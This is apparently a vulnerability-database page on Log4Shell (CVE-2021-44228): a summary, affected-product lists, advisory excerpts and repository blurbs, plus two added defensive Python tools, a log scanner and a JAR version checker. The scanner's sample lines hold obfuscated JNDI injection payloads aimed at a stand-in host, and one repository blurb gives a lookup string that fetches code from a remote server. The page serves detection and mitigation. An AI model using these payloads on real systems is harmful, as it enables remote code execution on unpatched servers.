CVE-2021-44228

Published: 2021-12-10 Updated: 2022-05-05
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
CVSS v2 Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Apache Log4j2 2.0-beta9 up to and including 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
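The trigger described above is a lookup string reaching a logged value. As an added example (not part of the Vulmon page and not Log4j project code), the following Python scans web-server log lines for that trigger. A plain grep for `${jndi:` misses most real traffic because Log4j resolves nested lookups such as `${lower:j}`, `${upper:d}` and the default-value form `${::-j}` before the JNDI lookup runs, so the scanner URL-decodes and resolves those idioms first and only then looks for `${jndi:<scheme>:`. The log lines, the IP addresses (RFC 5737 test ranges) and the function names are constructed for this example.

```python
"""Detect CVE-2021-44228 lookup payloads in log lines (added example; not Vulmon's or Log4j's code)."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# One Log4j lookup with no nested braces inside it: ${name:args}
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The trigger after normalisation: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _resolve_lookup(body: str) -> Optional[str]:
    """Reduce one lookup to a literal the way Log4j's substitutor does for the
    obfuscation idioms seen in the wild; None means 'leave it in place'."""
    name = body.split(":", 1)[0].strip().lower()
    if name == "jndi":
        return None                      # never rewrite the trigger itself
    if ":-" in body:                     # default-value syntax: ${x:-j} -> "j"
        return body.split(":-", 1)[1]    # (every variable treated as undefined)
    _, sep, arg = body.partition(":")
    if not sep:
        return None
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return None                          # sys:, env:, date: ... are left alone


def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve innermost lookups repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            literal = _resolve_lookup(m.group(1))
            if literal is None:
                return m.group(0)
            changed = True
            return literal

        text = _INNER_LOOKUP.sub(repl, text)
        if not changed:
            return text
    return text


def find_log4shell(line: str) -> List[str]:
    """Return the JNDI schemes (ldap, ldaps, rmi, dns, ...) a line would
    trigger once URL-decoded (twice, for double encoding) and de-obfuscated."""
    normalized = normalize(unquote(unquote(line)))
    return [m.group(1).lower() for m in _JNDI.finditer(normalized)]


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """(index, schemes) for every line that carries a payload."""
    hits = []
    for i, line in enumerate(lines):
        schemes = find_log4shell(line)
        if schemes:
            hits.append((i, schemes))
    return hits


# Constructed sample access-log lines (RFC 5737 test addresses), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F'
    '203.0.113.7%3A1099%2Fo%7D HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${env:NOPE:-j}ndi:${upper:d}ns://203.0.113.7/x}"',
]

if __name__ == "__main__":
    for idx, schemes in scan(SAMPLE_LOG):
        print(f"line {idx}: JNDI lookup via {', '.join(schemes)}")
```

Feed it `sys.stdin` or a file's lines to run it over real access logs; the scheme list matters because `dns://` payloads are usually reconnaissance (no code is loaded) while `ldap://` and `rmi://` are the code-loading paths, and the de-obfuscation step is what makes a signature like this hold up against the variants the fail2ban and grep-style tools listed further down this page are chasing.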

Vulnerable Products

apache log4j 2.0
apache log4j
siemens sppa-t3000 ses3000 firmware
siemens logo! soft comfort
siemens spectrum power 4 4.70
siemens spectrum power 4
siemens siveillance control pro
siemens energyip prepay 3.7
siemens energyip prepay 3.8
siemens siveillance identity 1.6
siemens siveillance identity 1.5
siemens siveillance command
siemens sipass integrated 2.85
siemens sipass integrated 2.80
siemens head-end system universal device integration system
siemens gma-manager
siemens energyip 8.5
siemens energyip 8.6
siemens energyip 8.7
siemens energyip 9.0
siemens energy engage 3.1
siemens e-car operation center
siemens desigo cc info center 5.0
siemens desigo cc info center 5.1
siemens desigo cc advanced reports 4.1
siemens desigo cc advanced reports 4.2
siemens desigo cc advanced reports 5.0
siemens desigo cc advanced reports 5.1
siemens desigo cc advanced reports 4.0
siemens comos
siemens capital 2019.1
siemens navigator
siemens xpedition package integrator
siemens xpedition enterprise
siemens vesys 2019.1
siemens vesys
siemens teamcenter
siemens spectrum power 7 2.30
siemens spectrum power 7
siemens solid edge harness design 2020
siemens solid edge harness design
siemens solid edge cam pro
siemens siveillance viewpoint
siemens siveillance vantage
siemens siguard dsa 4.3
siemens siguard dsa 4.4
siemens siguard dsa 4.2
siemens capital
siemens industrial edge management
siemens industrial edge management hub
siemens mendix
siemens mindsphere
siemens nx
siemens opcenter intelligence
siemens operation scheduler
siemens sentron powermanager 4.1
siemens sentron powermanager 4.2
intel audio development kit
intel system debugger
intel secure device onboard
intel oneapi sample browser
intel sensor solution firmware development kit
intel computer vision annotation tool
intel genomics kernel library
intel system studio
intel data center manager
debian debian linux 9.0
debian debian linux 10.0
debian debian linux 11.0
fedoraproject fedora 34
fedoraproject fedora 35
sonicwall email security
netapp oncommand insight
netapp cloud insights
netapp active iq unified manager
netapp cloud manager
netapp cloud secure agent
netapp ontap tools
netapp snapcenter
cisco unified communications manager im and presence service 11.5(1)
cisco unified customer voice portal 11.6
cisco webex meetings server
cisco packaged contact center enterprise 11.6(1)
cisco webex meetings server 3.0
cisco identity services engine
cisco data center network manager
cisco data center network manager 11.3(1)
cisco finesse
cisco finesse 12.6(1)
cisco identity services engine 2.4.0
cisco intersight virtual appliance
cisco iot operations dashboard
cisco network services orchestrator
cisco nexus dashboard
cisco unified contact center express
cisco webex meetings server 4.0
cisco advanced malware protection virtual private cloud appliance
cisco automated subsea tuning
cisco business process automation
cisco cloudcenter
cisco cloudcenter cost optimizer
cisco cloudcenter suite admin
cisco cloudcenter workload manager
cisco common services platform collector
cisco crosswork data gateway
cisco crosswork data gateway 3.0.0
cisco crosswork network controller
cisco crosswork network controller 3.0.0
cisco crosswork optimization engine
cisco crosswork optimization engine 3.0.0
cisco crosswork platform infrastructure
cisco crosswork platform infrastructure 4.1.0
cisco crosswork zero touch provisioning
cisco crosswork zero touch provisioning 3.0.0
cisco customer experience cloud agent
cisco cyber vision sensor management extension
cisco dna center
cisco dna spaces connector
cisco evolved programmable network manager
cisco fog director
cisco integrated management controller supervisor
cisco nexus insights
cisco optical network controller
cisco sd-wan vmanage
cisco ucs central
cisco ucs director
cisco virtualized infrastructure manager
cisco wan automation engine
cisco workload optimization manager
cisco connected mobile experiences
cisco network assurance engine
cisco prime service catalog
cisco smart phy
cisco unified contact center enterprise
cisco unified contact center enterprise 11.6(2)
cisco unified customer voice portal
cisco unified customer voice portal 12.0
cisco unified customer voice portal 12.5
cisco unity connection
cisco video surveillance operations manager
cisco virtual topology system
cisco virtualized voice browser
cisco unified intelligence center
cisco unified sip proxy
cisco unified workforce optimization
cisco broadworks
cisco cloud connect
cisco contact center domain manager
cisco contact center management portal
cisco emergency responder
cisco enterprise chat and email
cisco packaged contact center enterprise
cisco paging server
cisco unified communications manager
cisco unified communications manager 11.5(1)
cisco unified communications manager 11.5(1)su3
cisco unified communications manager im and presence service
cisco fxos 7.0.0
cisco fxos 6.7.0
cisco fxos 6.6.0
cisco fxos 6.5.0
cisco fxos 6.4.0
cisco fxos 6.3.0
cisco fxos 6.2.3
cisco fxos 7.1.0
cisco prime service catalog 12.1
cisco firepower threat defense 6.2.3
cisco firepower threat defense 6.4.0
cisco firepower threat defense 6.3.0
cisco unity connection 11.5
cisco firepower threat defense 6.5.0
cisco firepower threat defense 6.6.0
cisco sd-wan vmanage 20.3
cisco cyber vision sensor management extension 4.0.2
cisco sd-wan vmanage 20.5
cisco sd-wan vmanage 20.6
cisco unified communications manager im & presence service 11.5(1.22900.6)
cisco unified contact center express 12.5(1)
cisco unified customer voice portal 11.6(1)
cisco unified customer voice portal 12.0(1)
cisco unified customer voice portal 12.5(1)
cisco unified customer voice portal 12.6(1)
cisco unified intelligence center 12.6(1)
cisco unified intelligence center 12.6(2)
cisco unified sip proxy 010.000(000)
cisco unified sip proxy 010.000(001)
cisco unified sip proxy 010.002(000)
cisco unified sip proxy 010.002(001)
cisco emergency responder 11.5
cisco emergency responder 11.5(4.65000.14)
cisco emergency responder 11.5(4.66000.14)
cisco enterprise chat and email 12.0(1)
cisco enterprise chat and email 12.5(1)
cisco enterprise chat and email 12.6(1)
cisco finesse 12.5(1)
cisco paging server 8.3(1)
cisco paging server 8.4(1)
cisco paging server 8.5(1)
cisco paging server 9.0(1)
cisco paging server 9.0(2)
cisco paging server 9.1(1)
cisco paging server 12.5(2)
cisco paging server 14.0(1)
cisco ucs central software 2.0(1f)
cisco ucs central software 2.0(1g)
cisco ucs central software 2.0(1h)
cisco ucs central software 2.0(1k)
cisco ucs central software 2.0(1l)
cisco unified communications manager 11.5(1.17900.52)
cisco unified communications manager 11.5(1.18119.2)
cisco unified communications manager 11.5(1.18900.97)
cisco unified communications manager 11.5(1.21900.40)
cisco unified communications manager 11.5(1.22900.28)
cisco unified communications manager im & presence service 11.5(1)
cisco unified computing system 006.008(001.000)
cisco unified contact center enterprise 12.0(1)
cisco unified contact center enterprise 12.5(1)
cisco unified contact center enterprise 12.6(1)
cisco unified contact center enterprise 12.6(2)
cisco unified contact center express 12.6(1)
cisco unified contact center express 12.6(2)
cisco unified contact center management portal 12.6(1)
cisco automated subsea tuning 02.01.00
cisco cloudcenter suite 4.10(0.15)
cisco cloudcenter suite 5.3(0)
cisco cloudcenter suite 5.4(1)
cisco cloudcenter suite 5.5(0)
cisco cloudcenter suite 5.5(1)
cisco connected analytics for network deployment 007.001.000
cisco connected analytics for network deployment 007.002.000
cisco connected analytics for network deployment 7.3
cisco connected analytics for network deployment 007.003.000
cisco connected analytics for network deployment 007.003.001.001
cisco connected analytics for network deployment 007.003.003
cisco connected analytics for network deployment 008.000.000
cisco connected analytics for network deployment 008.000.000.000.004
cisco cx cloud agent 001.012
cisco cyber vision 4.0.2
cisco dna center 2.2.2.8
cisco dna spaces
cisco evolved programmable network manager 3.0
cisco evolved programmable network manager 3.1
cisco evolved programmable network manager 4.0
cisco evolved programmable network manager 4.1
cisco evolved programmable network manager 5.0
cisco evolved programmable network manager 5.1
cisco firepower threat defense 6.7.0
cisco firepower threat defense 7.0.0
cisco firepower threat defense 7.1.0
cisco identity services engine 002.004(000.914)
cisco identity services engine 002.006(000.156)
cisco identity services engine 002.007(000.356)
cisco identity services engine 003.000(000.458)
cisco identity services engine 003.001(000.518)
cisco identity services engine 003.002(000.116)
cisco integrated management controller supervisor 002.003(002.000)
cisco integrated management controller supervisor 2.3.2.0
cisco intersight virtual appliance 1.0.9-343
cisco mobility services engine
cisco network assurance engine 6.0(2.1912)
cisco network dashboard fabric controller 11.0(1)
cisco network dashboard fabric controller 11.1(1)
cisco network dashboard fabric controller 11.2(1)
cisco network dashboard fabric controller 11.3(1)
cisco network dashboard fabric controller 11.4(1)
cisco network dashboard fabric controller 11.5(1)
cisco network dashboard fabric controller 11.5(2)
cisco network dashboard fabric controller 11.5(3)
cisco network insights for data center 6.0(2.1914)
cisco optical network controller 1.1
cisco sd-wan vmanage 20.4
cisco sd-wan vmanage 20.6.1
cisco sd-wan vmanage 20.7
cisco sd-wan vmanage 20.8
cisco smart phy 3.1.2
cisco smart phy 3.1.3
cisco smart phy 3.1.4
cisco smart phy 3.1.5
cisco smart phy 3.2.1
cisco smart phy 21.3
cisco ucs central software 2.0
cisco ucs central software 2.0(1a)
cisco ucs central software 2.0(1b)
cisco ucs central software 2.0(1c)
cisco ucs central software 2.0(1d)
cisco ucs central software 2.0(1e)
cisco unified workforce optimization 11.5(1)
cisco unity connection 11.5(1.10000.6)
cisco video surveillance manager 7.14(1.26)
cisco video surveillance manager 7.14(2.26)
cisco video surveillance manager 7.14(3.025)
cisco video surveillance manager 7.14(4.018)
cisco virtual topology system 2.6.6
cisco wan automation engine 7.1.3
cisco wan automation engine 7.2.1
cisco wan automation engine 7.2.2
cisco wan automation engine 7.2.3
cisco wan automation engine 7.3
cisco wan automation engine 7.4
cisco wan automation engine 7.5
cisco wan automation engine 7.6
cisco common services platform collector 002.009(000.000)
cisco common services platform collector 002.009(000.001)
cisco common services platform collector 002.009(000.002)
cisco common services platform collector 002.009(001.000)
cisco common services platform collector 002.009(001.001)
cisco common services platform collector 002.009(001.002)
cisco common services platform collector 002.010(000.000)
cisco connected analytics for network deployment 006.004.000.003
cisco connected analytics for network deployment 006.005.000.
cisco connected analytics for network deployment 006.005.000.000
cisco connected analytics for network deployment 007.000.001
cisco crosswork network automation
cisco crosswork network automation 2.0.0
cisco crosswork network automation 3.0.0
cisco crosswork network automation 4.1.0
cisco crosswork network automation 4.1.1
snowsoftware vm access proxy
snowsoftware snow commander
bentley synchro 4d
bentley synchro

Vendor Advisories

Debian Bug report logs - #1001478 apache-log4j2: CVE-2021-44228: Remote code injection via crafted log messages. Package: src:apache-log4j2; Maintainer for src:apache-log4j2 is Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.org>; Date: Fri, 10 Dec ...
Debian Bug report logs - #1001729 apache-log4j2: CVE-2021-45046: Incomplete fix for CVE-2021-44228 in certain non-default configurations. Package: src:apache-log4j2; Maintainer for src:apache-log4j2 is Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.or ...
Chen Zhaojun of Alibaba Cloud Security Team discovered a critical security vulnerability in Apache Log4j, a popular logging framework for Java. JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message pa ...
It was found that the fix to address CVE-2021-44228 in Apache Log4j, a logging framework for Java, was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:l ...
A flaw was found in the Java logging library Apache Log4j 2 in versions from 2.0.0 and before and including 2.14.1 which could allow a remote attacker to execute code on the server if the system logs an attacker controlled string value with the attacker's JNDI LDAP server lookup. The highest threat from the vulnerability is to data confidentiality ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046. However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM. This update modifies Amazon L ...
Apache Log4j2 <= 2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2 ...
Synopsis: Critical: Red Hat Process Automation Manager 7.12.0 security update. Type/Severity: Security Advisory: Critical. Topic: An update is now available for Red Hat Process Automation Manager. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gi ...
Amazon Kinesis Agent versions within Amazon Linux 2 (AL2) prior to aws-kinesis-agent-2.0.4-1 included a version of Apache Log4j affected by CVE-2021-44228 and CVE-2021-45046. The Amazon Kinesis Agent has been updated to aws-kinesis-agent-2.0.4-1 within Amazon Linux 2, which mitigates CVE-2021-44228 and CVE-2021-45046. For additional detail see https: ...

Mailing Lists

Apache Log4j2 versions 2.14.1 and below information disclosure exploit ...
This Metasploit module will exploit an HTTP endpoint with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload. The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the ta ...
Apache Log4j2 versions 2.0-beta9 through 2.14.1 remote code execution exploit ...
VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on Windows. This Metasploit ...
Severity: moderate (CVSS: 3.7 AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). Description: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Patte ...
Description: JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashi ...

Github Repositories

Log4J-Mitigation-CVE-2021-44228. Background: Internet discussion was abuzz about a 0-day vulnerability (one that can yield remote code execution) in Apache's popular Log4J logging library for Java. This particular vulnerability, tracked as CVE-2021-44228 with the maximum "critical" CVSS score of 10, resides in Log4J's lookup capability, combined ...

About: A playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations. This particular problem lies within the JndiLookup feature and the log4j ability to interpret ALL the arguments of a logging call. I would expect it to only interpret the message pattern (the first argument of a logging call), e.g. the Hello {} in log.info("Hello {}", "${j ...

Did someone say gist? A fail2ban filter for the Log4J CVE-2021-44228 exploit. More here: jaygooby.org/2021/12/13/a-fail2ban-filter-for-the-log4j-cve-2021-44228. Find interesting referers in access.log. Unknown host: removes the offending line from ~/.ssh/known_hosts. More here: jaygooby.org/2021/02/10/unknown-host. Generates an nginx map file so you can use the correct ...

Running Spring Boot app on Kubernetes. This project describes how to run a Spring Boot app on Kubernetes. You don't actually need to rewrite your app in order to target a K8s cluster: Spring Boot can run on many platforms, thanks to the abstraction level it provides. This app is made of a single REST controller: @RestController class HelloController { @Value("${app.m ...

F5 Professional Services. Solutions, tools and examples developed by the F5 Professional Services team. Examples: The examples folder has common examples and solutions for different products of the F5 portfolio. Use them as a reference for your own or extend them for a particular use case. Example | Description: ansible-playbooks: contains sample ansible playbooks; as3-d ...

CVE-2021-44228: log4j / log4shell Security Research Summary. This repository contains all gathered resources we used during our Incident Response on CVE-2021-44228 aka log4shell. Threat Intel: URL | Info: musana.net/2021/12/13/log4shell-Quick-Guide/ log4shell-Quick-Guide; cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 MITRE CVE-2021-44228; www ...

CVE-2021-44228. A Zeek package which raises notices and optionally generates a log for Log4J (CVE-2021-44228) attempts. Installation: $ zkg install cve-2021-44228. Use against a pcap you already have: $ zeek -Cr scripts/__load__.zeek your.pcap. Options and notes: Option CVE_2021_44228::log determines if the log4j log is generated. Defaults to T. Example Notice: #separator \x09 #set_ ...

test-44228. A simple example for CVE-2021-44228. Implements two Java CLIs, one using log4j 1.x, the other using log4j 2.x, to demonstrate the log4shell vulnerability. See also: www.lunasec.io/docs/blog/log4j-zero-day/ and www.oracle.com/security-alerts/alert-cve-2021-44228.html. Usage: Vulnerable Log4J2: Start a listener on some server (localhost or remote), e.g.: $ ...

CVE-2021-44228 Helpers. Helpers, examples, and exploits for cve-2021-44228. Helpers: Echo chamber (cd echochamber): logs input via log4j. Build: ./gradlew build. Run: ./gradlew run --console=plain. Ldap Exfil Server (cd ldap-listener): LDAP server that logs requests to allow for exfiltration. Build: pip install -r requirements.txt. Run: python3 listener.py <port>. Vulnerable ap ...

Log4Shell-IOCs. Members of the Curated Intelligence Trust Group have compiled a list of IOC feeds and threat reports focused on the recent Log4Shell exploit targeting CVE-2021-44228 in Log4j. Indicators of Compromise (IOCs): Source | URL: GreyNoise (1) gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217; GreyNoise (2) gist.github.com/nathanqthai/01808c5699 ...

Vendor | App | Source: Broadcom | CA Advanced Authentication | support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793; Broadcom | CA Risk Authentication | support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerabili ...

cve-2021-44228-qingteng-online-patch. What is this: Fix CVE-2021-44228 using the vulnerability itself. How to use: Inject the following code anywhere likely vulnerable to CVE-2021-44228: ${jndi:ldaps://cve-2021-44228.qingteng.cn:8443/patch} and the vulnerability will get fixed, or run your own server using binaries from releases.

SitecoreSolr-log4j-mitigation CVE-2021-44228. This repository contains a script that you can run on your (Windows) machine to mitigate CVE-2021-44228 by applying the advice as documented on solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228. The PowerShell script assumes that you have used the default root path when installing Sitecore with ...

trivy-cve-scan. Scan multiple Docker images with Trivy for a specific CVE. Usage example (thanks to medium.com/linkbynet/cve-2021-44228-finding-log4j-vulnerable-k8s-pods-with-bash-trivy-caa10905744d): kubectl get pods -o jsonpath='{range .items[*]}{.spec.containers[*].image}{" "}' | tr " " "\n" | sort -u > images.txt; ./trivy_ ...

Log4j | CVE-2021-44228 | IOCs List. Log4j IP List: ...

KPACK Awesome Demo Setup. kpack is the Kubernetes implementation of pack, the cloud native buildpack technology used before. Pre-requisite: install kpack on your Kubernetes cluster or run make kpack. Shared resources: edit kpack/shared/kpack_values.yaml corresponding with your environment registry (url / username) and run: AWESOMEDEMO_registry_password=password-to-get-access ...

CVE-2021-44228 checker. This is the repository for checking for vulnerability CVE-2021-44228. How it works? Step 1: Run the server application. The image ghcr.io/greymd/cve-2021-44228/server is available and can be run on Docker: $ docker run -p 1389:1389 -t ghcr.io/greymd/cve-2021-44228/server. Step 2: Access the endpoint with log4j. Prepare ...

log4j-vulnerable-app-cve-2021-44228-terraform. A Terraform to deploy a vulnerable app and a JNDIExploit to work with CVE-2021-44228.

LOG4 CVE-2021-44228 IOC. A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application utilises the Java logging ...

Log4Shell. This repo contains code to demonstrate how the remote code execution vulnerability in log4j works. Read more here: www.lunasec.io/docs/blog/log4j-zero-day/ and here: nvd.nist.gov/vuln/detail/CVE-2021-44228. How it works: DoJndiLookup executes the following statement: LOGGER.info("${jndi:ldap://localhost/cn=log4shell,dc=example,dc=com}");

Log4j-CVE-2021-44228 detector scanner playbook. Ansible playbook to verify target Linux hosts using the official Red Hat Log4j detector script for Log4Shell (CVE-2021-44228). Red Hat detector: The result is saved in a txt file under detector_dir (default: /tmp/cve-2021-44228/). How to run: Default variables scan all of the /var/ path for affected files. Customize the vars.yml file f ...

check-log4j. This tool will try to determine if the host it is running on is likely vulnerable to the latest reason that the internet is on fire: the log4j RCE CVE-2021-44228. This is different from other tools that attempt to verify whether a specific service is vulnerable by triggering the exploit and, e.g., tracking pingbacks on a DNS canary token. That approach tells you ...
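The offline approach check-log4j describes (inspect what is on disk instead of triggering the lookup), carried out on a single archive, as an added example in Python that is not check-log4j's own code: it walks a JAR, recursing into nested JARs such as a Spring Boot fat jar's BOOT-INF/lib/, reads log4j-core's own Maven pom.properties for the version, applies the version rules from the summary at the top of this page (2.0-beta9 through 2.15.0, minus the 2.12.2, 2.12.3 and 2.3.1 backports), and treats a missing JndiLookup.class as the class-removal mitigation. The sample fat jar is built in memory for the example, so nothing on the host is touched and no lookup is ever triggered; the entry paths and function names are this example's assumptions.

```python
"""Offline check of a JAR/WAR for log4j-core in the CVE-2021-44228 range (added example; not check-log4j's code)."""
import io
import re
import zipfile
from typing import List, Tuple

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
SAFE_RELEASES = {"2.12.2", "2.12.3", "2.3.1"}       # backports named in the advisory
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def version_key(version: str) -> tuple:
    """Sortable key for Log4j version strings: 2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1."""
    main, _, qualifier = version.partition("-")
    nums = [int(x) for x in main.split(".")]
    nums += [0] * (3 - len(nums))
    if not qualifier:
        rank, n = 1, 0                               # final release
    else:
        m = re.fullmatch(r"(beta|rc)(\d+)", qualifier)
        rank = {"beta": -1, "rc": 0}[m.group(1)] if m else -2
        n = int(m.group(2)) if m else 0
    return tuple(nums) + (rank, n)


LOW, HIGH = version_key("2.0-beta9"), version_key("2.15.0")   # range from the summary


def classify(version: str, has_jndi_lookup: bool) -> str:
    """Apply the advisory's version rules plus the JndiLookup removal mitigation."""
    if version in SAFE_RELEASES:
        return "not vulnerable (security backport)"
    if not LOW <= version_key(version) <= HIGH:
        return "not vulnerable (outside affected range)"
    if not has_jndi_lookup:
        return "mitigated (JndiLookup.class removed)"
    return "VULNERABLE"


def inspect_archive(data: bytes, path: str = "", depth: int = 0) -> List[Tuple[str, str, str]]:
    """Report (archive path, version, verdict) for every log4j-core found,
    recursing into nested archives such as BOOT-INF/lib/*.jar (bounded depth)."""
    findings: List[Tuple[str, str, str]] = []
    if depth > 5:
        return findings                               # guard against zip-in-zip bombs
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings                               # not an archive; skip it
    with zf:
        names = sorted(zf.namelist())
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(\S+)", props, re.MULTILINE)
            if m:
                version = m.group(1)
                findings.append((path or "<root>", version,
                                 classify(version, JNDI_CLASS in names)))
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                nested = f"{path}!/{name}" if path else name
                findings.extend(inspect_archive(zf.read(name), nested, depth + 1))
    return findings


def _zip_bytes(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_fat_jar(version: str, keep_jndi_lookup: bool = True) -> bytes:
    """Constructed sample: a Spring Boot style fat jar bundling log4j-core.
    Class bodies are placeholders; only entry names and pom.properties matter."""
    core = {
        POM_PROPS: f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n",
        "org/apache/logging/log4j/core/Core.class": b"\xca\xfe\xba\xbe",
    }
    if keep_jndi_lookup:
        core[JNDI_CLASS] = b"\xca\xfe\xba\xbe"
    return _zip_bytes({
        "META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n",
        f"BOOT-INF/lib/log4j-core-{version}.jar": _zip_bytes(core),
        "BOOT-INF/lib/commons-io-2.11.0.jar": _zip_bytes({"org/x/Y.class": b"\xca\xfe\xba\xbe"}),
    })


if __name__ == "__main__":
    for sample in (build_sample_fat_jar("2.14.1"),
                   build_sample_fat_jar("2.14.1", keep_jndi_lookup=False),
                   build_sample_fat_jar("2.17.1")):
        for archive, version, verdict in inspect_archive(sample):
            print(f"{archive}: log4j-core {version} -> {verdict}")
```

Pass the bytes of a real .jar or .war to inspect_archive to use it on a deployment. Two caveats apply: "outside affected range" only speaks to this CVE (2.15.0 and 2.16.0 have their own follow-up advisories listed on this page), and a shaded or repackaged log4j-core may not carry pom.properties at all, which is why the JndiLookup.class check is kept separate from the version lookup.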

log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it and the server also vulnerable via user-agent attacks The remote exploit app in this demo is based on that found at githubcom/kozmer/log4j-shell-poc This demo tomcat server (Tomcat 853, Java 180u51) has been r

CVE-2021-44228(Apache Log4j Remote Code Execution) all log4j-core versions >=20-beta9 and <=2141 The version of 1x have other vulnerabilities, we recommend that you update the latest version Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228) Usage: git clone githubcom/tangxiaofeng7/apache-log4j-pocgit cd apache-log4j-poc/src/ma

ServiceNow MID Server This is the full collection of all Service-Now MID Server versions as Docker container A note on Apache Log4j Vulnerability (CVE-2021-44228) According to KB1000959 the MID servers are not affected by this vulnerability However, as the MID Server does contain the files for log4j 2140, theoretically the vulnerability is still present Therefore the Jndi

log4shell-example This pieces together a few things across github/internet and makes understanding why the log4shell is so dangerous Built/tested rootless containers with podman and docker using x86_64 images An example tomcat java application that uses log4j and has a login screen to illustrate how easy it is to input exploitable ldap references An LDAP server that will ser

Node Security Shield A Developer and Security Engineer friendly package for Securing NodeJS Applications Inspired by the log4J vulnerability (CVE-2021-44228) which can be exploited because an application can make arbitrary network calls We felt there is an need for an application to declare what privileges it can have so that exploitation of such vulnerabilities becomes harde

